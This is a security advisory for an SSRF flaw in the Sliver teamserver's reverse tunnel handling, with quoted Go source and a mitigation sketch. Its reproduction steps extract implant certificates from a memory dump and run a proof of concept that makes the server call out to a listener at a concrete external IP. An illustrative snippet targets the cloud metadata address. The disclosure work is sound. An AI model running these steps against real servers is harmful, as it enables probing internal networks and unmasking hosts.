CVE-2025-27090 – github.com/bishopfox/sliver
Package
Manager: go
Name: github.com/bishopfox/sliver
Vulnerable Version: >=1.5.26 <1.5.43
Severity
Level: Medium
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L/E:U/RL:O/RC:C
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N
EPSS: 0.00185 (percentile: 0.40489)
Details
SSRF in sliver teamserver

### Summary
The reverse port forwarding in the sliver teamserver allows the implant to open a reverse tunnel on the teamserver without verifying whether the operator instructed the implant to do so.

### Reproduction steps
Run the server:
```
wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux
chmod +x sliver-server_linux
./sliver-server_linux
```
Generate an implant binary:
```
generate --mtls 127.0.0.1:8443
```
Run it on Windows, then `Task manager -> find process -> Create memory dump file`.

Install RogueSliver and extract the certs:
```
git clone https://github.com/ACE-Responder/RogueSliver.git
pip3 install -r requirements.txt --break-system-packages
python3 ExtractCerts.py implant.dmp
```
Start the callback listener. The teamserver will connect when the POC is run and send "ssrf poc" to nc:
```
nc -nvlp 1111
```
Run the POC (pasted at bottom of this file):
```
python3 poc.py <SLIVER IP> <MTLS PORT> <CALLBACK IP> <CALLBACK PORT>
python3 poc.py 192.168.1.33 8443 44.221.186.72 1111
```

### Details
Here an envelope is read from the connection, and if `envelope.Type` matches a registered handler, that handler is executed:

```go
func handleSliverConnection(conn net.Conn) {
	mtlsLog.Infof("Accepted incoming connection: %s", conn.RemoteAddr())
	implantConn := core.NewImplantConnection(consts.MtlsStr, conn.RemoteAddr().String())

	defer func() {
		mtlsLog.Debugf("mtls connection closing")
		conn.Close()
		implantConn.Cleanup()
	}()

	done := make(chan bool)
	go func() {
		defer func() {
			done <- true
		}()
		handlers := serverHandlers.GetHandlers()
		for {
			envelope, err := socketReadEnvelope(conn)
			if err != nil {
				mtlsLog.Errorf("Socket read error %v", err)
				return
			}
			implantConn.UpdateLastMessage()
			if envelope.ID != 0 {
				implantConn.RespMutex.RLock()
				if resp, ok := implantConn.Resp[envelope.ID]; ok {
					resp <- envelope // Could deadlock, maybe want to investigate better solutions
				}
				implantConn.RespMutex.RUnlock()
			} else if handler, ok := handlers[envelope.Type]; ok {
				mtlsLog.Debugf("Received new mtls message type %d, data: %s", envelope.Type, envelope.Data)
				go func() {
					respEnvelope := handler(implantConn, envelope.Data)
					if respEnvelope != nil {
						implantConn.Send <- respEnvelope
					}
				}()
			}
		}
	}()

Loop:
	for {
		select {
		case envelope := <-implantConn.Send:
			err := socketWriteEnvelope(conn, envelope)
			if err != nil {
				mtlsLog.Errorf("Socket write failed %v", err)
				break Loop
			}
		case <-done:
			break Loop
		}
	}
	mtlsLog.Debugf("Closing implant connection %s", implantConn.ID)
}
```

The available handlers:

```go
func GetHandlers() map[uint32]ServerHandler {
	return map[uint32]ServerHandler{
		// Sessions
		sliverpb.MsgRegister:    registerSessionHandler,
		sliverpb.MsgTunnelData:  tunnelDataHandler,
		sliverpb.MsgTunnelClose: tunnelCloseHandler,
		sliverpb.MsgPing:        pingHandler,
		sliverpb.MsgSocksData:   socksDataHandler,

		// Beacons
		sliverpb.MsgBeaconRegister: beaconRegisterHandler,
		sliverpb.MsgBeaconTasks:    beaconTasksHandler,

		// Pivots
		sliverpb.MsgPivotPeerEnvelope: pivotPeerEnvelopeHandler,
		sliverpb.MsgPivotPeerFailure:  pivotPeerFailureHandler,
	}
}
```

If we send an envelope with `envelope.Type` equal to `MsgTunnelData`, we enter the `tunnelDataHandler` function:

```go
// The handler mutex prevents a send on a closed channel, without it
// two handlers calls may race when a tunnel is quickly created and closed.
func tunnelDataHandler(implantConn *core.ImplantConnection, data []byte) *sliverpb.Envelope {
	session := core.Sessions.FromImplantConnection(implantConn)
	if session == nil {
		sessionHandlerLog.Warnf("Received tunnel data from unknown session: %v", implantConn)
		return nil
	}
	tunnelHandlerMutex.Lock()
	defer tunnelHandlerMutex.Unlock()
	tunnelData := &sliverpb.TunnelData{}
	proto.Unmarshal(data, tunnelData)
	sessionHandlerLog.Debugf("[DATA] Sequence on tunnel %d, %d, data: %s", tunnelData.TunnelID, tunnelData.Sequence, tunnelData.Data)
	rtunnel := rtunnels.GetRTunnel(tunnelData.TunnelID)
	if rtunnel != nil && session.ID == rtunnel.SessionID {
		RTunnelDataHandler(tunnelData, rtunnel, implantConn)
	} else if rtunnel != nil && session.ID != rtunnel.SessionID {
		sessionHandlerLog.Warnf("Warning: Session %s attempted to send data on reverse tunnel it did not own", session.ID)
	} else if rtunnel == nil && tunnelData.CreateReverse == true {
		createReverseTunnelHandler(implantConn, data)
		//RTunnelDataHandler(tunnelData, rtunnel, implantConn)
	} else {
		tunnel := core.Tunnels.Get(tunnelData.TunnelID)
		if tunnel != nil {
			if session.ID == tunnel.SessionID {
				tunnel.SendDataFromImplant(tunnelData)
			} else {
				sessionHandlerLog.Warnf("Warning: Session %s attempted to send data on tunnel it did not own", session.ID)
			}
		} else {
			sessionHandlerLog.Warnf("Data sent on nil tunnel %d", tunnelData.TunnelID)
		}
	}
	return nil
}
```

The `createReverseTunnelHandler` reads the envelope, creating a socket for `req.Rportfwd.Host` and `req.Rportfwd.Port`.
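The flaw in the branch logic above can be modeled in a few lines. This is an illustrative sketch with stand-in types, not Sliver's actual structs: when the tunnel ID is unknown and `CreateReverse` is set, the dial path is reached with no check that the operator ever requested a reverse port forward.

```go
package main

import "fmt"

// Stand-ins for sliverpb.TunnelData and its Rportfwd field (field names mirror
// the advisory's excerpts; this is a model of the decision tree, not Sliver code).
type Rportfwd struct {
	Host string
	Port uint32
}

type TunnelData struct {
	TunnelID      uint64
	CreateReverse bool
	Rportfwd      *Rportfwd
}

var rtunnels = map[uint64]string{} // TunnelID -> owning session ID

// dispatch models tunnelDataHandler's branching. Note the CreateReverse branch
// fires for any unknown tunnel ID, with no operator-side authorization.
func dispatch(sessionID string, td *TunnelData) string {
	if owner, ok := rtunnels[td.TunnelID]; ok {
		if owner == sessionID {
			return "forward data on existing rtunnel"
		}
		return "rejected: session does not own tunnel"
	}
	if td.CreateReverse {
		// The real handler dials td.Rportfwd.Host:td.Rportfwd.Port here -> SSRF.
		rtunnels[td.TunnelID] = sessionID
		return fmt.Sprintf("server dials %s:%d", td.Rportfwd.Host, td.Rportfwd.Port)
	}
	return "unknown tunnel, dropped"
}

func main() {
	td := &TunnelData{
		TunnelID:      1337, // any ID not already registered
		CreateReverse: true,
		Rportfwd:      &Rportfwd{Host: "169.254.169.254", Port: 80}, // attacker-chosen target
	}
	fmt.Println(dispatch("session-A", td)) // server dials 169.254.169.254:80
}
```

This is why extracted mTLS certs are sufficient for the POC: the teamserver trusts the message contents, not an operator-initiated state.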
`createReverseTunnelHandler` then writes `recv.Data` to that socket:

```go
func createReverseTunnelHandler(implantConn *core.ImplantConnection, data []byte) *sliverpb.Envelope {
	session := core.Sessions.FromImplantConnection(implantConn)
	req := &sliverpb.TunnelData{}
	proto.Unmarshal(data, req)

	var defaultDialer = new(net.Dialer)
	remoteAddress := fmt.Sprintf("%s:%d", req.Rportfwd.Host, req.Rportfwd.Port)
	ctx, cancelContext := context.WithCancel(context.Background())
	dst, err := defaultDialer.DialContext(ctx, "tcp", remoteAddress)
	//dst, err := net.Dial("tcp", remoteAddress)
	if err != nil {
		tunnelClose, _ := proto.Marshal(&sliverpb.TunnelData{
			Closed:   true,
			TunnelID: req.TunnelID,
		})
		implantConn.Send <- &sliverpb.Envelope{
			Type: sliverpb.MsgTunnelClose,
			Data: tunnelClose,
		}
		cancelContext()
		return nil
	}
	if conn, ok := dst.(*net.TCPConn); ok {
		// {{if .Config.Debug}}
		//log.Printf("[portfwd] Configuring keep alive")
		// {{end}}
		conn.SetKeepAlive(true)
		// TODO: Make KeepAlive configurable
		conn.SetKeepAlivePeriod(1000 * time.Second)
	}
	tunnel := rtunnels.NewRTunnel(req.TunnelID, session.ID, dst, dst)
	rtunnels.AddRTunnel(tunnel)
	cleanup := func(reason error) {
		// {{if .Config.Debug}}
		sessionHandlerLog.Infof("[portfwd] Closing tunnel %d (%s)", tunnel.ID, reason)
		// {{end}}
		tunnel := rtunnels.GetRTunnel(tunnel.ID)
		rtunnels.RemoveRTunnel(tunnel.ID)
		dst.Close()
		cancelContext()
	}

	go func() {
		tWriter := tunnelWriter{
			tun:  tunnel,
			conn: implantConn,
		}
		// portfwd only uses one reader, hence the tunnel.Readers[0]
		n, err := io.Copy(tWriter, tunnel.Readers[0])
		_ = n // avoid not used compiler error if debug mode is disabled
		// {{if .Config.Debug}}
		sessionHandlerLog.Infof("[tunnel] Tunnel done, wrote %v bytes", n)
		// {{end}}
		cleanup(err)
	}()

	tunnelDataCache.Add(tunnel.ID, req.Sequence, req)

	// NOTE: The read/write semantics can be a little mind boggling, just remember we're reading
	// from the server and writing to the tunnel's reader (e.g. stdout), so that's why ReadSequence
	// is used here whereas WriteSequence is used for data written back to the server

	// Go through cache and write all sequential data to the reader
	for recv, ok := tunnelDataCache.Get(tunnel.ID, tunnel.ReadSequence()); ok; recv, ok = tunnelDataCache.Get(tunnel.ID, tunnel.ReadSequence()) {
		// {{if .Config.Debug}}
		//sessionHandlerLog.Infof("[tunnel] Write %d bytes to tunnel %d (read seq: %d)", len(recv.Data), recv.TunnelID, recv.Sequence)
		// {{end}}
		tunnel.Writer.Write(recv.Data)

		// Delete the entry we just wrote from the cache
		tunnelDataCache.DeleteSeq(tunnel.ID, tunnel.ReadSequence())
		tunnel.IncReadSequence() // Increment sequence counter

		// {{if .Config.Debug}}
		//sessionHandlerLog.Infof("[message just received] %v", tunnelData)
		// {{end}}
	}

	// If cache is building up it probably means a msg was lost and the server is currently hung waiting for it.
	// Send a Resend packet to have the msg resent from the cache
	if tunnelDataCache.Len(tunnel.ID) > 3 {
		data, err := proto.Marshal(&sliverpb.TunnelData{
			Sequence: tunnel.WriteSequence(), // The tunnel write sequence
			Ack:      tunnel.ReadSequence(),
			Resend:   true,
			TunnelID: tunnel.ID,
			Data:     []byte{},
		})
		if err != nil {
			// {{if .Config.Debug}}
			//sessionHandlerLog.Infof("[shell] Failed to marshal protobuf %s", err)
			// {{end}}
		} else {
			// {{if .Config.Debug}}
			//sessionHandlerLog.Infof("[tunnel] Requesting resend of tunnelData seq: %d", tunnel.ReadSequence())
			// {{end}}
			implantConn.RequestResend(data)
		}
	}
	return nil
}
```

### Impact
With the current POC, this mostly leaks the teamserver's origin IP behind redirectors. I am 99% sure full-read SSRF is achievable, but the POC is blind.
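One plausible direction for a server-side mitigation (an illustrative sketch, not necessarily the patch shipped in 1.5.43) is to gate `createReverseTunnelHandler` on state the operator created: only honor `CreateReverse` for a (session, tunnel) pair that was pre-registered when the operator issued an `rportfwd` command. All names below (`approvedTunnels`, `mayCreateReverseTunnel`) are hypothetical.

```go
package main

import (
	"fmt"
	"sync"
)

// approvedTunnels records (sessionID, tunnelID) pairs that the operator
// explicitly requested. Names and structure are hypothetical, for illustration.
type approvedTunnels struct {
	mu   sync.Mutex
	keys map[string]bool // "sessionID/tunnelID"
}

func (a *approvedTunnels) Approve(sessionID string, tunnelID uint64) {
	a.mu.Lock()
	defer a.mu.Unlock()
	a.keys[fmt.Sprintf("%s/%d", sessionID, tunnelID)] = true
}

func (a *approvedTunnels) IsApproved(sessionID string, tunnelID uint64) bool {
	a.mu.Lock()
	defer a.mu.Unlock()
	return a.keys[fmt.Sprintf("%s/%d", sessionID, tunnelID)]
}

var approved = &approvedTunnels{keys: map[string]bool{}}

// mayCreateReverseTunnel is the gate a patched createReverseTunnelHandler
// would consult before calling DialContext.
func mayCreateReverseTunnel(sessionID string, tunnelID uint64) bool {
	return approved.IsApproved(sessionID, tunnelID)
}

func main() {
	approved.Approve("session-A", 7)                     // operator ran rportfwd for tunnel 7
	fmt.Println(mayCreateReverseTunnel("session-A", 7))  // true: operator-initiated
	fmt.Println(mayCreateReverseTunnel("session-A", 9))  // false: implant-initiated, reject
}
```

With such a check, an implant-supplied `TunnelData` with `CreateReverse` set but no matching operator request would be dropped before the server dials out.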
Metadata
Created: 2025-02-19T21:11:33Z
Modified: 2025-02-20T22:47:01Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-fh4v-v779-4g2w/GHSA-fh4v-v779-4g2w.json
CWE IDs: ["CWE-918"]
Alternative ID: GHSA-fh4v-v779-4g2w
Finding: F100
Auto approve: 1